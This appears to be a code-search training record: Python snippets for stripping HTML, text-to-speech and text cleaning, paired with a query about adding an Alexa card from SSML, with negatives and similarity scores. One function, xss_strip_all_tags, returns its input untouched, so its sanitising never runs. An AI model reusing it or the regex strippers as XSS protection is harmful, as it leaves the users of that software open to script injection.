newtext=re.sub(r'\\r\\r\\r\\n', ' ', newtext)\r\n #remove LL specific text\r\n if customtextlist:\r\n for i in customtextlist:\r\n newtext=re.sub(i, '', newtext)\r\n return newtext", "def normalize_enml(enml):\n content = extract_contents(enml)\n\n content = content.replace('\\xC2\\xA0', ' ')\n content = content.encode('utf-8')\n content = content.replace('</en-media>', '') # Some devices have closing media tags, others dont\n\n # Convert special chars\n content = content.replace('&amp;', '&')\n content = content.replace('&quot;', '\"')\n content = content.replace('&gt;', '>')\n content = content.replace('&lt;', '<')\n content = content.replace('&nbsp;', ' ')\n\n # Remove anchor tag from inline src/href urls\n content = re.sub(r'(href|src)(=[\\'\"]?[^<]*)(<a[^>]+>)(.*?)(</a>)', r'\\1\\2\\4', content)\n\n bits = re.split(r'(<div[^>]*>.*?</div>)', content)\n\n if bits[0].strip() == '': # Get rid of blank top lines\n bits.pop(0)\n\n if len(bits) > 0 and '<div>' not in bits[0]:\n bits[0] = '<div>{0}</div>\\n'.format(bits[0])\n\n for k, v in enumerate(bits):\n if not v:\n bits[k] = '\\n'\n\n return ''.join(bits)", "def removeMarkup(self, text):\n text = TextFormat.stripTagRe.sub('', text)\n return unescape(text)", "def remove_tags(raw):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, ' ', raw)\n return cleantext", "def replace_with_text(self):\r\n self.parser.stripTags(self.get_top_node(), 'b', 'strong', 'i', 'br', 'sup')", "def promed_html_to_formatted_text(html):\n # This is to fix some cases in malformed html where <s aren't esacaped.\n # >s can be parsed without escaping.\n normed_html = html.\\\n replace(\"<<\", \"&lt;<\").\\\n replace(\"<http\", \"&lt;http\").\\\n replace(\"< \", \"&lt; \")\n return dom_tree_to_formatted_text(BeautifulSoup(normed_html))", "def remove_html_tags(text):\n clean = re.compile('<.*?>|&ndash; ')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n clean = re.compile('<.*?>|&ndash; ')\n return re.sub(clean, '', text)", "def strip_html_tags(text):\r\n soup = BeautifulSoup(text, 'lxml')\r\n stripped_text = soup.get_text(separator=\" \")\r\n return stripped_text", "def remove_html_tags(text):\n tag_pattern = re.compile(r'<[^>]+>')\n return tag_pattern.sub('', text)", "def remove_tags(text):\n # Remove HTML tags\n soup = BeautifulSoup(text, \"html.parser\")\n [s.extract() for s in soup(['iframe', 'script'])]\n stripped_text = soup.get_text()\n stripped_text = re.sub(r'[\\r|\\n|\\r\\n]+', '\\n', stripped_text)\n \n \n text = unicodedata.normalize('NFKD', stripped_text).encode('ascii', 'ignore').decode('utf-8', 'ignore') # Remove Accented characters\n text = re.sub(r'[^\\x00-\\x7F]+','', text) # Remove Non-Ascii characters\n text = re.sub(\"[a-z0-9\\.\\-+_]+@[a-z0-9\\.\\-+_]+\\.[a-z]+\", '', text) # Remove Emails\n text = re.sub(r\"http\\S+\", \"\", text) # Remove URLs\n return text", "async def text_to_speech(self, tts_input: str) -> str:\n self.process_event(\n PipelineEvent(\n PipelineEventType.TTS_START,\n {\n \"engine\": self.tts_engine,\n \"language\": self.pipeline.tts_language,\n \"voice\": self.pipeline.tts_voice,\n \"tts_input\": tts_input,\n },\n )\n )\n\n try:\n # Synthesize audio and get URL\n tts_media_id = tts_generate_media_source_id(\n self.hass,\n tts_input,\n engine=self.tts_engine,\n language=self.pipeline.tts_language,\n options=self.tts_options,\n )\n tts_media = await media_source.async_resolve_media(\n self.hass,\n tts_media_id,\n None,\n )\n except Exception as src_error:\n _LOGGER.exception(\"Unexpected error during text to speech\")\n raise TextToSpeechError(\n code=\"tts-failed\",\n message=\"Unexpected error during text to speech\",\n ) from src_error\n\n _LOGGER.debug(\"TTS result %s\", tts_media)\n\n self.process_event(\n PipelineEvent(\n PipelineEventType.TTS_END,\n {\n \"tts_output\": {\n \"media_id\": tts_media_id,\n **asdict(tts_media),\n }\n },\n )\n )\n\n return tts_media.url", "def remove_html_tags(text):\r\n clean = re.compile('<.*?>')\r\n return re.sub(clean, '', text)", "def strip_html_tags(text):\n if text is np.nan:\n return text\n regex = re.compile(r\"<.*?>\")\n return re.sub(regex, \"\", text)", "def text2speech(text):\n try:\n myobj = gTTS(text=text, lang='en', slow=False)\n myobj.save(\"tmp.mp3\")\n playsound(\"tmp.mp3\")\n os.remove(\"tmp.mp3\")\n return True\n except Exception as e:\n mytext = \"Sorry I couldn't understand, or not implemented to handle this input\"\n print(mytext)\n myobj = gTTS(text=mytext, lang='en', slow=False)\n myobj.save(\"tmp.mp3\")\n playsound(\"tmp.mp3\")\n os.remove(\"tmp.mp3\")\n print(e)\n return False", "def html_to_text(text):\n # type (str) -> str\n soup = BeautifulSoup(text, \"html.parser\")\n return \"\\n\".join(soup.stripped_strings)", "def set_speech_ssml(self, ssml):\n self.response.outputSpeech.type = 'SSML'\n self.response.outputSpeech.ssml = ssml", "def xss_strip_all_tags(s):\n return s\n def fixup(m):\n text = m.group(0)\n if text[:1] == \"<\":\n return \"\" # ignore tags\n if text[:2] == \"&#\":\n try:\n if text[:3] == \"&#x\":\n return unichr(int(text[3:-1], 16))\n else:\n return unichr(int(text[2:-1]))\n except ValueError:\n pass\n elif text[:1] == \"&\":\n import htmlentitydefs\n entity = htmlentitydefs.entitydefs.get(text[1:-1])\n if entity:\n if entity[:2] == \"&#\":\n try:\n return unichr(int(entity[2:-1]))\n except ValueError:\n pass\n else:\n return unicode(entity, \"iso-8859-1\")\n return text # leave as is\n \n return re.sub(\"(?s)<[^>]*>|&#?\\w+;\", fixup, s)", "def audio2text(audio):\n r = sr.Recognizer()\n with sr.AudioFile(audio) as source:\n audio = r.listen(source)\n\n text = r.recognize_google(audio, language=\"de_DE.utf8\")\n print(f'fetched {file}: {text}')\n return text", "def reformat_text(self, text):\n xml = BeautifulSoup(text)\n self.remove_header_and_footer(xml)\n self.process_superscripts(xml)\n self.remove_footnotes(xml)\n text = xml.get_text() # Strip XML tags.\n text = self.join_hyphenated_words(text)\n text = self.remove_linebreaks(text)\n return text", "def convertHTML(self, text):\n return text.replace('&#39;', \"'\")", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>|\\\\n')\n return re.sub(clean, '', text)", "def get_text_hook(raw):\n soup = bs4.BeautifulSoup(quopri.decodestring(raw), features=\"lxml\")\n return soup.text", "def strip_html(inputString):\r\n return BeautifulSoup(inputString, \"html.parser\").text", "def remove_html(text):\n return re.sub(r'<.*?>', r'', text)", "def getHTMLText(self, s):\r\n\r\n # Removes any \"<\" or \">\" from the text, and replaces line ends with <br> tags\r\n if s is not None:\r\n res = str(s)\r\n res = string.replace(res, \">\", \"&gt;\")\r\n res = string.replace(res, \"<\", \"&lt;\")\r\n res = string.replace(s, \"\\n\", \"<br style='mso-data-placement:same-cell;'/>\")\r\n else:\r\n res = \"\"\r\n\r\n # Inserts formatting tag around text, if defined\r\n if self.formatBeginTag:\r\n res = self.formatBeginTag + res + self.formatEndTag\r\n\r\n return res", "def strip_html_tags(text):\n soup = BeautifulSoup(text, \"html.parser\")\n stripped_text = soup.get_text(separator=\" \")\n return stripped_text", "def strip_html_tags(text):\n soup = BeautifulSoup(text, \"html.parser\")\n stripped_text = soup.get_text(separator=\" \")\n return stripped_text", "def remove_tags(text):\n tree = html.fromstring(text)\n return tree.xpath(\"//text()\")", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text).rstrip('...')", "def convert_srt_to_txt(text, join=False):\n lines = text.split('\\n')\n result = []\n for line in lines:\n if not line.strip(): # Skipping empty lines\n continue\n elif line.strip().isdigit(): # Skip lines containing only numbers\n continue\n elif (line.startswith(\"WEBVTT\") or\n line.startswith(\"Kind: captions\") or\n line.startswith(\"Language: en\")): # Skipping lines containing service information\n continue\n # We skip lines with the format \"00:00:00,000 --> 00:00:03,090\"\n elif re.match(r\"\\d{2}:\\d{2}:\\d{2}.\\d{3} --> \\d{2}:\\d{2}:\\d{2}.\\d{3}\", line.strip()):\n continue\n else:\n result.append(line.strip())\n if join:\n out = join_lines(result) # Combining strings into sentences\n else:\n out = \"\\n\".join(result) # Combining strings without parsing into sentences\n return out", "def html_to_text(html):\n html_parser = 'html5lib'\n soup = BeautifulSoup(html, html_parser)\n pretty_html = soup.prettify()\n pretty_soup = BeautifulSoup(pretty_html, html_parser)\n text = pretty_soup.get_text()\n lines = [s for s in text.splitlines() if not re.search(r'^\\s*$', s)]\n return os.linesep.join(lines)", "def stripHtml(html):\n\t# kinda works\n\tres = html.replace(\"&lt;\", \"<\")\n\tres = res.replace(\"&gt;\", \">\")\n\tres = re.sub(r'<[^>]+>', '', res)\n\treturn res", "def striphtml(content):\n\tif not isinstance(content, basestring):\n\t\treturn u''\n\tcontent = re_script.sub(u'',content)\n\tdoc = html.fragment_fromstring(content, create_parent=True)\n\tclean.clean_html(doc)\n\treturn unicode(re_nl.sub(u'', doc.text_content()))", "def clean_html(html):\n html = re.sub(r\"(?s)<!--(.*?)-->[\\n]?\", \"\\\\1\", html)\n html = re.sub(r\"<!--\", \"\", html)\n if html == '':\n return ''\n s = MLStripper()\n s.feed(html)\n return s.get_data().strip()", "def stripHTMLTags (html):\r\n import re\r\n text = html\r\n \r\n # apply rules in given order!\r\n rules = [\r\n { r'>\\s+' : u'>'}, # remove spaces after a tag opens or closes\r\n { r'\\s+' : u' '}, # replace consecutive spaces\r\n { r'\\s*<br\\s*/?>\\s*' : u'\\n'}, # newline after a <br>\r\n #{ r'</(div)\\s*>\\s*' : u'\\n'}, # newline after </p> and </div> and <h1/>...\r\n #{ r'</(p|h\\d)\\s*>\\s*' : u'\\n\\n'}, # newline after </p> and </div> and <h1/>...\r\n { r'<head>.*<\\s*(/head|body)[^>]*>' : u'' }, # remove <head> to </head>\r\n { r'<a\\s+href=\"([^\"]+)\"[^>]*>.*</a>' : u'' }, # show links instead of texts\r\n { r'[ \\t]*<[^<]*?/?>' : u'' }, # remove remaining tags\r\n { r'^\\s+' : u'' } # remove spaces at the beginning\r\n ]\r\n \r\n for rule in rules:\r\n for (k,v) in rule.items():\r\n regex = re.compile (k)\r\n text = regex.sub (v, text)\r\n \r\n # replace special strings\r\n special = {\r\n '&nbsp;' : ' ', '&amp;' : '&', '&quot;' : '\"',\r\n '&lt;' : '<', '&gt;' : '>'\r\n }\r\n \r\n for (k,v) in special.items():\r\n text = text.replace (k, v)\r\n \r\n return text", "def remove_html_tags(data):\n p = re.compile(r'<.*?>')\n return p.sub('', data)", "def strip_html(text):\n soup = BeautifulSoup(text, \"html.parser\")\n return soup.get_text()", "def clean_xml_tags(text):\n tag_re = re.compile(r'<[^>]+>')\n text = tag_re.sub('', text)\n return text", "def sentences(summary, nlp):\n text = remove_spurious_words(text_of(summary))\n all_sentence = [sentence for sentence in re.split(\"[。,?!\\n]\", text) if sentence]\n all_sentence = [re.sub('[ ]+', ' ', sentence.encode('gb2312', 'ignore').decode('gb2312')).strip() for sentence in\n all_sentence]\n return [nlp.ner(sentence) for sentence in all_sentence if sentence]", "def _get_plain_text(self, url, soup, site):\n print('Get plaint text: ' + url)\n title = str(soup.find(class_=self._title_tags[site]))\n content = str(soup.find(class_=self._content_tags[site]))\n # h = html2text.HTML2Text() # uncomment this segment of code\n # h.ignore_links = True # if you want to get plain text\n # h.ignore_images = True\n # title = h.handle(title)\n # content = h.handle(content)\n if title == None or content == None:\n print('Different website structure: ' + url)\n return ''\n return self._clean(title + content, no_punc=True) # with symbols\n # return title + content # without symbols", "def cleanText(text):\n try:\n text = str(text)\n\n # remove contactions and stop words\n text = contractions(text)\n # remove html entities\n cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')\n new_text = cleanr.sub('', text.strip())\n return re.sub(r'\\s+', ' ', re.sub(r'\\W+', \" \", new_text))\n # TAG_RE = re.compile(r'<[^>]+>')\n except:\n print(\"An exception occurred with: \" + text)\n return str(text)", "def html(input):\n output=atpic.cleaner_alex.clean(input)\n return output", "def strip_logfile_html(text):\n out_text = \"\"\n buff = \"\"\n start_tag = \"\"\n end_tag = \"\"\n context = \"none\"\n for i in range(len(text)):\n c = text[i]\n # print \"c = \"+str(c)+\" context = \"+str(context)\n if c == \"<\":\n if context == \"none\":\n # Possible start of a tag, depending on\n # next character\n context = \"putative_tag\"\n buff = c\n else:\n # Everything up to this needs to\n # be dumped directly to output\n out_text = out_text + escape_xml_characters(buff)\n elif context == \"putative_tag\":\n buff = buff + c\n if c.isalpha():\n context = \"start_tag\"\n elif c == \"/\":\n context = \"end_tag\"\n elif c == \"!\":\n context = \"comment_tag\"\n else:\n # Not a tag so dump it\n context = \"none\"\n out_text = out_text + escape_xml_characters(buff)\n elif context == \"start_tag\" or context == \"end_tag\" or context == \"comment_tag\":\n buff = buff + c\n if c == \">\":\n if context == \"start_tag\":\n # End of a start tag\n # Process it and see if we can\n # salvage something\n salvage_text = salvage_tag_data(buff)\n if salvage_text != \"\":\n out_text = out_text + escape_xml_characters(salvage_text)\n # Reset the buffer\n context = \"none\"\n buff = \"\"\n elif context == \"end_tag\":\n # End of an end tag\n # Throw this away (for now)\n context = \"none\"\n buff = \"\"\n elif context == \"comment_tag\":\n # End of a comment\n # Throw this away (for now)\n context = \"none\"\n buff = \"\"\n else:\n # Nothing special about this\n # Add to the output\n out_text = out_text + escape_xml_characters(c)\n # Finished - append the remaining buffer\n out_text = out_text + escape_xml_characters(buff)\n return remove_blank_lines(out_text)", "def text_to_pango(self):\n def replace(text):\n components = text.split(\"&\")\n out = components[0]\n for item in components[1:]:\n if item.startswith(\"amp;\") \\\n or (not item.startswith(\"amp;\")\n and html.unescape(f'&{item}') != f'&{item}'):\n out += \"&\" + item\n else:\n out += \"&amp;\" + item\n return out\n\n if \"full_text\" in self.output.keys():\n self.output[\"full_text\"] = replace(self.output[\"full_text\"])\n if \"short_text\" in self.output.keys():\n self.output[\"short_text\"] = replace(self.output[\"short_text\"])", "def preprocess_ST_message(text):\n # Define ST Regex Patters\n REGEX_PRICE_SIGN = re.compile(r'\\$(?!\\d*\\.?\\d+%)\\d*\\.?\\d+|(?!\\d*\\.?\\d+%)\\d*\\.?\\d+\\$')\n REGEX_PRICE_NOSIGN = re.compile(r'(?!\\d*\\.?\\d+%)(?!\\d*\\.?\\d+k)\\d*\\.?\\d+')\n REGEX_TICKER = re.compile('\\$[a-zA-Z]+')\n REGEX_USER = re.compile('\\@\\w+')\n REGEX_LINK = re.compile('https?:\\/\\/[^\\s]+')\n REGEX_HTML_ENTITY = re.compile('\\&\\w+')\n REGEX_NON_ACSII = re.compile('[^\\x00-\\x7f]')\n REGEX_PUNCTUATION = re.compile('[%s]' % re.escape(string.punctuation.replace('<', '')).replace('>', ''))\n REGEX_NUMBER = re.compile(r'[-+]?[0-9]+')\n\n text = text.lower()\n\n # Replace ST \"entitites\" with a unique token\n text = re.sub(REGEX_TICKER, ' <TICKER> ', text)\n text = re.sub(REGEX_USER, ' <USER> ', text)\n text = re.sub(REGEX_LINK, ' <LINK> ', text)\n text = re.sub(REGEX_PRICE_SIGN, ' <PRICE> ', text)\n text = re.sub(REGEX_PRICE_NOSIGN, ' <NUMBER> ', text)\n text = re.sub(REGEX_NUMBER, ' <NUMBER> ', text)\n # Remove extraneous text data\n text = re.sub(REGEX_HTML_ENTITY, \"\", text)\n text = re.sub(REGEX_NON_ACSII, \"\", text)\n text = re.sub(REGEX_PUNCTUATION, \"\", text)\n # Tokenize and remove < and > that are not in special tokens\n words = \" \".join(token.replace(\"<\", \"\").replace(\">\", \"\")\n if token not in ['<TICKER>', '<USER>', '<LINK>', '<PRICE>', '<NUMBER>']\n else token\n for token\n in text.split())\n\n return words", "def normalize_with_audio(self, text: str, verbose: bool = False) -> str:\n text = text.strip()\n if not text:\n if verbose:\n print(text)\n return text\n text = pynini.escape(text)\n\n def get_tagged_texts(text):\n tagged_lattice = self.find_tags(text)\n tagged_texts = self.select_all_semiotic_tags(tagged_lattice)\n return tagged_texts\n\n tagged_texts = set(get_tagged_texts(text))\n normalized_texts = []\n\n for tagged_text in tagged_texts:\n self.parser(tagged_text)\n tokens = self.parser.parse()\n tags_reordered = self.generate_permutations(tokens)\n for tagged_text_reordered in tags_reordered:\n tagged_text_reordered = pynini.escape(tagged_text_reordered)\n\n verbalizer_lattice = self.find_verbalizer(tagged_text_reordered)\n if verbalizer_lattice.num_states() == 0:\n continue\n\n verbalized = self.get_all_verbalizers(verbalizer_lattice)\n for verbalized_option in verbalized:\n normalized_texts.append(verbalized_option)\n\n if len(normalized_texts) == 0:\n raise ValueError()\n\n normalized_texts = [post_process(t) for t in normalized_texts]\n normalized_texts = set(normalized_texts)\n return normalized_texts", "def RemoveHTMLTags(data):\n\n p = re.compile(r'<[^<]*?>')\n return p.sub('', data)", "def remove_html(x: str) -> str:\n regex = r\"<.+?>\"\n return re.sub(regex, \"\", x)", "def speech_response_ssml(output, endsession):\n return {\n 'outputSpeech': {\n 'type': 'SSML',\n 'ssml': \"<speak>\" +output +\"</speak>\" \n },\n 'shouldEndSession': endsession\n }", "def preprocess(text):\r\n\r\n #Regex to remove URL and @ symbol\r\n regex = '@\\S*|http\\S*|www\\S*'\r\n preprocessed_text = re.sub(regex, '', text)\r\n preprocessed_text = deEmojify(preprocessed_text)\r\n preprocessed_text = strip_html(preprocessed_text)\r\n\r\n return preprocessed_text", "def convert_content(self, html):\n\n try:\n dom = BeautifulSoup(html, 'html.parser')\n return self.parse_content(dom)\n except:\n return html", "def make_silence_phones_txt(self):\n raise NotImplementedError", "def remove_tags(text):\n\n global cleanr\n global cleann\n global cleans\n try:\n text = BeautifulSoup(text)\n for table in text.findAll(\"table\"):\n table.extract()\n text = text.text\n text = re.sub(cleanr, '', text)\n text = re.sub(cleann, '', text)\n text = re.sub(cleans, ' ', text)\n\n except Exception as e:\n pass\n\n return text", "def clean_html(text):\n cleanr = re.compile(\"<.*?>\")\n clean_text = re.sub(cleanr, \"\", text)\n return clean_text", "def clean(text, replies=False, hashtags=False, rts=False, urls=False):\n text = text.replace('\\n', ' ')\n text = text.replace('\\r', ' ')\n text = html.unescape(text)\n if rts:\n text = regex_rts.sub('', text)\n if replies:\n text = regex_replies.sub('', text)\n if hashtags:\n text = regex_hashtags.sub('', text)\n if urls:\n text = regex_urls.sub('', text)\n text = regex_whitespace.sub(' ', text)\n text = text.strip()\n return text", "def parse_text(self, text):\r\n MAXLEN = 100\r\n sentences = []\r\n punct = [\",\",\":\",\";\",\".\",\"–\",\"?\",\"!\",\"(\",\")\"] # Interpunctuation marks\r\n text = text.replace(\"\\r\", \" \").replace(\"\\t\", \" \") # Remove CR and tabs\r\n words = text.split(\" \") if len(text) > MAXLEN else []\r\n sentence = \"\" if len(text) > MAXLEN else text\r\n\r\n # Preprocess list for silence markers\r\n if conf.SilenceMarker in text:\r\n words_new = []\r\n if not words and sentence: # Was too short to be cut initially\r\n words = text.split(\" \")\r\n sentence = \"\"\r\n for w in filter(None, words):\r\n if conf.SilenceMarker not in w.lower():\r\n words_new.append(w)\r\n else:\r\n text_chunks = w.lower().split(conf.SilenceMarker)\r\n for i, part in enumerate(text_chunks):\r\n if part:\r\n words_new.append(part)\r\n if i < len(text_chunks) - 1:\r\n words_new.append(conf.SilenceMarker)\r\n else:\r\n if words_new and conf.SilenceMarker in words_new[-1]:\r\n words_new[-1] += conf.SilenceMarker\r\n else:\r\n words_new.append(conf.SilenceMarker)\r\n words = words_new\r\n\r\n for w in words:\r\n if conf.SilenceMarker in w:\r\n if sentence:\r\n sentences.append(sentence.strip())\r\n sentences.append(w)\r\n sentence = \"\"\r\n elif w[-1] in punct or w[0] in punct: # Encountered punctuation\r\n if w[-1] in punct and (len(sentence) + len(w) + 1 < MAXLEN):\r\n # Word ends with punct and sentence can still be added to\r\n sentences.append(sentence.strip() + \" \" + w.strip())\r\n sentence = \"\" # Save sentence and word, start new sentence\r\n elif w[0] in punct and w[-1] not in punct:\r\n # Word starts with punctuation, like '('\r\n sentences.append(sentence.strip()) # Save current sentence\r\n sentence = w # Start a new sentence with punct and word\r\n else: # word ends with punct and sentence already long enough\r\n sentences.extend([sentence.strip(), w.strip()])\r\n sentence = \"\" \r\n else:\r\n if (len(sentence) + len(w) + 1 < MAXLEN): # Sentence still\r\n sentence += \" \" + w # short enough\r\n else: # Sentence too long\r\n sentences.append(sentence.strip())\r\n sentence = w # Start a new sentence with the word\r\n if sentence:\r\n sentences.append(sentence.strip())\r\n return sentences", "def _get_text(raw_html):\n bs = BeautifulSoup(raw_html)\n text_nodes = bs.find_all(_is_text_tag)\n text_elements = [_get_child_text(node) for node in text_nodes]\n return ' '.join(chain(*chain(*text_elements)))", "def txt(input):\n output=atpic.cleaner_alex.txtclean(input)\n return output" ]
[ "0.74603456", "0.71631587", "0.63201004", "0.6288619", "0.6236227", "0.6161472", "0.6157704", "0.61351144", "0.6124986", "0.6062542", "0.6052379", "0.5990713", "0.5988849", "0.59758717", "0.5871905", "0.5855006", "0.5835654", "0.58335525", "0.58257437", "0.5820562", "0.57998407", "0.5776051", "0.5769966", "0.5767022", "0.5760792", "0.57532287", "0.5735325", "0.57270354", "0.5726879", "0.5696022", "0.5681448", "0.56777686", "0.5666513", "0.566427", "0.56526744", "0.56446546", "0.56354785", "0.56271464", "0.56146824", "0.5593406", "0.5593214", "0.5587791", "0.5587791", "0.5580561", "0.55752707", "0.5571537", "0.55710036", "0.55595475", "0.55522406", "0.5548131", "0.5531441", "0.5512631", "0.5503497", "0.54863846", "0.5485271", "0.5483645", "0.5483173", "0.5483173", "0.54728067", "0.546504", "0.54571414", "0.5456701", "0.54487026", "0.54370314", "0.5435246", "0.5435246", "0.54195726", "0.54157835", "0.54145515", "0.54045564", "0.5398233", "0.53979796", "0.53978854", "0.5396904", "0.5382863", "0.53782856", "0.5371862", "0.53600395", "0.5349436", "0.53467345", "0.53281915", "0.5307609", "0.53060275", "0.5305588", "0.5297783", "0.52859074", "0.52728087", "0.52643454", "0.5264068", "0.5235683", "0.52142006", "0.5213487", "0.52048683", "0.5194118", "0.51729894", "0.51698965", "0.51697975" ]
0.7831128
3
Add a card by translating ssml text to card content.
def add_card(handler_input, response): # type: (HandlerInput, Response) -> None response.card = SimpleCard( title=skill_name, content=convert_speech_to_text(response.output_speech.ssml))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def addContent(text):", "def createTextCard(self, x, z):\n self.myText = TextNode('scrollValue')\n funcs.setZeroToText(self.myText, self.designsLeft)\n self.enableSubmit()\n self.myText.setFont(self.font)\n self.myText.setCardColor(globals.colors['guiblue3'])\n self.myText.setFrameColor(globals.colors['guiblue2'])\n self.myText.setFrameAsMargin(0, 0, 0, 0)\n self.myText.setFrameLineWidth(3)\n self.myText.setCardAsMargin(.1, .1, .1, .1)\n textNodePath = aspect2d.attachNewNode(self.myText)\n textNodePath.setScale(0.09)\n textNodePath.setPos(x, 0, z)\n self.myWidgets.append(textNodePath)", "def add_card(handler_input, response):\n # type: (HandlerInput, Response) -> None\n if response.card:\n return\n response.card = ui.SimpleCard(\n title='Daily Dungeon',\n content=convert_speech_to_text(response.output_speech.ssml)\n )", "def add_card(self, card_widget: WidgetT):", "def add_card(self, card):\n self.cards.append(card)", "def add_card(self, card):\n self.cards.append(card)", "def add_card(self, card):\n self.cards.append(card)", "def add_card(self, card):\n self.cards.append(card)", "def add_text(self, text):\n text_template = self.templateEnv.get_template(f'{ReportGenerator.COMPONENTS_FOLDER}/text.html')\n text_output = text_template.render(text=text)\n self.contents.append(text_output)", "def addCard(self,card:Card):\r\n self.cards.append(card)", "def add_card(self, card):\n self.get_cards().append(card)", "def create_card(cls, card_title, card_content, content_id, css_class=\"card-text\"):\n card = dbc.Card(\n dbc.CardBody(\n [\n html.H5(card_title, className=\"card-title\"),\n html.P(card_content, className=css_class, id=content_id),\n ],\n className=css_class,\n )\n )\n return card", "def createTitleCard2(self, name, text, wordwrap, x, z, scale=0.025):\n self.myTitle2 = TextNode(name)\n self.myTitle2.setFont(self.font)\n self.myTitle2.setText(text)\n self.myTitle2.setWordwrap(wordwrap)\n self.myTitle2.setTextColor(globals.colors['guiwhite'])\n self.myTitle2.setCardColor(globals.colors['guiblue3'])\n self.myTitle2.setFrameColor(globals.colors['guiblue2'])\n self.myTitle2.setFrameAsMargin(.3, .5, .5, .5)\n self.myTitle2.setFrameLineWidth(3)\n self.myTitle2.setCardAsMargin(.3, .5, .5, .5)\n textNodePath = aspect2d.attachNewNode(self.myTitle2)\n textNodePath.setScale(scale)\n textNodePath.setPos(x, 0, z)\n self.myWidgets.append(textNodePath)", "def createTextCard2(self, x, z):\n self.myText2 = TextNode('scrollValue2')\n funcs.setZeroToText(self.myText2, self.simulationsLeft)\n self.enableSubmit()\n self.myText2.setFont(self.font)\n self.myText2.setCardColor(globals.colors['guiblue3'])\n self.myText2.setFrameColor(globals.colors['guiblue2'])\n self.myText2.setFrameAsMargin(0, 0, 0, 0)\n self.myText2.setFrameLineWidth(3)\n self.myText2.setCardAsMargin(.1, .1, .1, .1)\n textNodePath = aspect2d.attachNewNode(self.myText2)\n textNodePath.setScale(0.09)\n textNodePath.setPos(x, 0, z)\n self.myWidgets.append(textNodePath)", "def add_card(self, card):\n \n self._hand.add_first(card)", "def add_card(self, card):\n self.deckcards.append(card)", "def add(self, cards):\n\n super().add(cards)\n self._update_value()", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = [double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)]\n\n nodes = fields(integer_or_string, card, 'node', i=9, j=len(card))\n return ACCEL1(sid, scale, N, nodes, cid=cid, comment=comment)", "def add_card(self, card):\n self.decklist.append(card)", "def register(self):\n with open(self.file) as xml:\n self.text = Text(urn=self.name, resource=xml)", "def add_text(self, text: str) -> None:\n self.texts.append(text.strip().rstrip(\"\\n\"))", "def massage_addcontent(self) -> str:\n pass", "def add_card(self, card):\r\n self.hand.append(card)", "def add(self, card):\n if card != None:\n self.cards.append(card)", "def set_card_simple(self, title, content):\n self.response.card.type = 'Simple'\n self.response.card.title = title\n self.response.card.content = content", "def add(self, name, content):\n raise NotImplementedError", "def add_card(update, context):\n query = update.callback_query\n if query.message.reply_to_message:\n user = query.message.reply_to_message.from_user\n else:\n user = query.message.chat\n bot = context.bot\n CURRENT_CONTEXT = USERS[user.username]\n message = f'Round: {CURRENT_CONTEXT[\"round\"]} ({CURRENT_CONTEXT[\"username\"]}) \\nDealers Card: {CURRENT_CONTEXT[\"dealer_card\"]}\\nYour Cards: {CURRENT_CONTEXT[\"player_cards\"]} \\nYour total: {CURRENT_CONTEXT[\"player_total\"]} \\n\\n You {query.data}! New card?'\n bot.edit_message_text(\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n text=message,\n reply_markup=card_markup\n )\n\n return ADD_CARD", "def createCard(self,id,name):\n card = Card(id,name)\n self.cards[id] = card\n print('Created Card:'+id)", "def add_card(self, card):\n self.hand.append(card)", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n g3 = integer(card, 6, 'g3')\n g4 = integer(card, 7, 'g4')\n assert len(card) == 8, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, g3, g4, comment=comment)", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n assert len(card) == 6, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, comment=comment)", "def add_text(self, text):\n self.text = self.text + text", "def add_text(self, text: str, lang: str):\n self.add_relationship(\n Nampi_type.Core.has_text, self._graph.string_literal(text, lang)\n )", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n cid = integer_or_blank(card, 3, 'cid', 0)\n mag = double(card, 4, 'mag')\n xyz = array([double_or_blank(card, 5, 'X1', 0.0),\n double_or_blank(card, 6, 'X2', 0.0),\n double_or_blank(card, 7, 'X3', 0.0)])\n assert len(card) <= 8, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, xyz, cid=cid, comment=comment)", "def add_card(self, card):\n list_query = self.session.query(List).filter_by(id=card.list_id)\n cardlist = list_query.one()\n # TODO(errorhandling): if list does not exists then it should throw an exception\n\n card_query = self.session.query(Card).filter_by(\n list_id=cardlist.id,\n translation_id=card.translation_id)\n\n try:\n db_card = card_query.one()\n except NoResultFound:\n db_card = Card(\n translation_id=card.translation_id,\n list_id=cardlist.id\n )\n\n self.session.add(db_card)\n self.session.commit()\n\n return card", "def add_card(self, card):\n self.cards.append(card)\n self.sum_hand(self.cards)", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n p1 = double_or_blank(card, 3, 'p1', 0.0)\n pressures = [\n p1,\n double_or_blank(card, 4, 'p2'),\n double_or_blank(card, 5, 'p3'),\n double_or_blank(card, 6, 'p4')]\n\n eids = [eid]\n g1_thru = integer_string_or_blank(card, 7, 'g1/THRU')\n if 